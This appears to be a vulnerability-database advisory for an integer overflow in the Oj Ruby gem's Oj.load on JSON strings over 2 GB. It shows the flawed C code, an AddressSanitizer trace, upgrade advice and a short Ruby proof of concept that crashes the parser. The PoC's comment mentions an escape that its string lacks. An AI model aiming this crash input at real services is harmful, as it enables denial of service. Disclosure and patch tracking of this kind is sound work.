CVE-2026-54903High▾ TwilightOj: Integer Overflow in Oj.load 2GB String Handling
▾ Twilight zone — High severity, or a signal on a lesser flaw
impact 41.3 · likelihood 0.1 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Exploit-prediction probability, daily snapshots since Jul 4.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
0.3%
0.3% → 0.4%
Oj.load is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in buf_append_string (buf.h:61) converts the string length to a large negative size_t, causing memcpy to copy an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.
ext/oj/buf.h and ext/oj/parse.cext/oj/buf.h, line 61:
inline static void buf_append_string(Buf buf, const char *s, size_t slen) {
// ...
memcpy(buf->tail, s, slen); // slen derived from 32-bit int that wrapped negative
In parse.c, escape sequence handling computes the remaining string length as an int:
// parse.c:402 (read_escaped_str)
int slen = (int)(s - str); // ← wraps to negative when string > 2 GB
buf_append_string(buf, str, (size_t)slen); // ← (size_t)(-2147483648) = 0x80000000...
ASAN report:
==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)
#0 __asan_memcpy
#1 buf_append_string /ext/oj/buf.h:61
#2 read_escaped_str /ext/oj/parse.c:402
#3 read_str /ext/oj/parse.c:542
#4 oj_parse2 /ext/oj/parse.c:882
#5 oj_pi_parse /ext/oj/parse.c:1256
#6 oj_object_parse /ext/oj/object.c:701
#7 load /ext/oj/oj.c:1259
0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800, 0x7f5aa6ff0809)
require 'oj'
n = 1 << 31 # 2 GB
json = '"' + ('A' * n) + 'A"' # >2GB JSON string with a trailing escape
Oj.load(json)
oj < 3.17.2Upgrade to a patched release:
oj 3.17.3Connected by shared product, vendor, weakness, or advisory.
CVE-2026-54899HighOj: Use-After-Free in Oj::Parser Symbol Key Cache Toggle
CVE-2026-54502HighOj: Stack Buffer Overflow in Oj.dump via Large Indent
CVE-2026-54500Medium· 5.3Oj: intern.c form_attr (uninitialized stack read)
CVE-2026-54592High· 7.5Oj: Stack Buffer Overflow in Oj::Doc#each_child via Deeply Nested Input
CVE-2026-54896HighOj: Heap Buffer Overflow in Oj.dump Exception Serialization via Large Indent
CVE-2026-54897HighOj: Use-After-Free in Oj::Doc Iterators via Reentrant Close